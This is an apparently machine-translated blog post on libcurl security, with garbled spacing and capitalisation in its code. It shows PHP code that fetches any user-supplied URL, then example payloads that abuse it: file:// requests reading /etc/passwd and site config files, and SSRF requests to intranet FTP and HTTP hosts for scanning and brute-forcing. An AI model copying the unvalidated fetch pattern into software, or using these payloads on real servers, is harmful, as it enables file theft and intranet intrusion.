Libcurl library security

Woyigui blog

The curl library is a free large client URL transfer library. The official description is as follows:

Reference
Libcurl is a free and easy-to-use client-side URL transfer library, supporting FTP, FTPS, HTTP, HTTPS, SCP, SFTP, TFTP, TELNET, DICT, LDAP, LDAPS and FILE. libcurl supports SSL certificates, http post, http put, FTP uploading, HTTP form based upload, proxies, cookies, user + password authentication (Basic, Digest, NTLM, Negotiate, Kerberos4 ), file transfer resume, http proxy tunneling and more! ]

To obtain a page, you can use the following simple code:
PHP code:

<? PHP
Function get_url ($ url ){
$ Ch = curl_init ();
$ Timeout = 5;
Curl_setopt ($ ch, CURLOPT_URL, $ url );
Curl_setopt ($ ch, CURLOPT_VERBOSE, 0 );
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
Curl_setopt ($ ch, CURLOPT_CONNECTTIMEOUT, $ timeout );
// Curl_setopt ($ ch, CURLOPT_FOLLOWLOCATION, true );
$ Result = curl_exec ($ ch );
$ Info = curl_getinfo ($ ch );
If ($ result <> ){
Echo $ result. "<br/> ";
} Else {
Echo "$ url: no <br/> ";
}
Curl_close ($ ch );

}
If (isset ($ _ GET ["url"]) {
Get_url ($ _ GET ["url"]);
Exit ();
}

Then we can go through the http://www.woyigui.cn/curl.php? Url = http://www.google.com this url is very convenient to get the google Page and output to the current page.
Similarly, python is simpler:

#! /Usr/bin/env python
Import urllib, sys

F = urllib. urlopen (sys. argv [1])
While 1:
Buf = f. read (2048)
If not len (buf ):
Break
Sys. stdout. write (buf)

You can use the following method to obtain the page:

$./Downlaod. py http://www.woyigui.cn/index.php

You can also use:

$./Downlaod. py http://www.woyigui.cn/phpinfo.tar.gz> phpinfo.tar.gz
To download files.
Of course, more scripts support the curl library.

As curl is large and supports a large number of protocols, security problems will arise. Currently, you can think of the following problems:

1. Arbitrary File Viewing Vulnerability
Because it supports the file protocol, the PHP code just now, if we control the URL parameter, we can use the following to access any file on the machine with the read permission:

Http://www.woyigui.cn/php_vul/curl_vul.php? Url = file: // etc/passwd

This code is used to obtain the/etc/passwd file. When you know the absolute path of the website, you can directly read the source code of any file on the website:

Http: // 192.168.9.30/php_vul/curl_vul.php? Url = file: // var/www/config. inc. php

The python language can be directly read, or the protocol header can be added. We use the following python script:

Woyigui @ fvck :~ /Python $./downlaod. py/etc/passwd
Root: x: 0: 0: root:/bin/bash
Daemon: x: 1: 1: daemon:/usr/sbin:/bin/sh
....

Woyigui @ fvck :~ /Python $./downlaod. py file: // etc/passwd
Root: x: 0: 0: root:/bin/bash
Daemon: x: 1: 1: daemon:/usr/sbin:/bin/sh
Bin: x: 2: 2: bin:/bin/sh
.....

2. bypass the firewall and penetrate the Intranet
Suppose there is a simple network topology:

A (Attacker: 10.0.0.1) --- B (WEB server: 10.0.0.10) --- C (Firewall: prevents Internet IP addresses from accessing Intranet machines and only allows data transmission between the WEB and intranet) --- "D (Intranet: 192.168.9.2/254)

In such a simple network environment, if the WEB server has a page with CUL parameters that can be constructed by users, attackers can use the curl function to access data through the Intranet, this is because the WEB server initiates network requests when executing the CURL command.
1) access Intranet ftp resources:

Http://ww.woyigui.cn/php_vul/curl_vul.php? Url = ftp: // test: test@192.168.9.27

Of course, if you confirm that this machine has an ftp server, you can use the returned value to perform brute-force cracking.
2) Access Intranet http resources:

Http://www.woyigui.cn/php_vul/curl_vul.php? Url = http: // 192.168.0.1

In many cases, many large companies build internal websites or forums on the Intranet, and provide some public internal information for download. At this time, you can use CURL to request files on the internal HTTP server. In addition, you can also scan the internal WEB server by returning values. Similarly, in some cases, you can also send GET, XSS, or XSS through the internal website, and then use the XSS ping and other methods to further attack.
3) telnet to penetrate internal servers
...
4) use scp protocol to access host resources
...
3. Online webpage proxy
This is not an attack category.
Because it can obtain a remote page, you can find a rice meat J or shell, but to support the curl library, you can parameter phpinfo information. Create a PHP file to retrieve the page, so that the page will not be blocked.

For various reasons, other methods are not provided. As long as attackers are familiar with various protocols, such as smb: // ftp: //, the attack can be achieved. Of course, there are certainly other methods that can expand the attack type to maximize the attack! It depends on the audience.
Although this library is rarely used in general WEB development. However, there are still many websites with WEB applications. In addition, the curl Library supports multiple types of scripts, so other scripts or languages may also have problems. Currently, I only tested php and python.
This is an official support language list:

Ada95, Basic, C, C ++, Ch, Cocoa, D, Dylan, Eiffel, Euphoria, Falcon, Ferite, Gambas, glib/GTK +, Haskell, ILE/RPG, java, Lisp,

Lua, Mono ,. NET, Object-Pascal, OCaml, Pascal, Perl, PHP, S, Python, R, Rexx, Ruby, Scheme, S-Lang, Smalltalk, SP-Forth, SPL, Tcl, visual Basic, Visual FoxPro, Q, wxWidgets, XBLite

The article certainly did not maximize the attack capability, and you need to explore it .. :)

Refer:
Http://curl.haxx.se/libcurl/
Http://www.acunetix.com/blog/websecuritynews/acusensor-curl-and-zen-cart/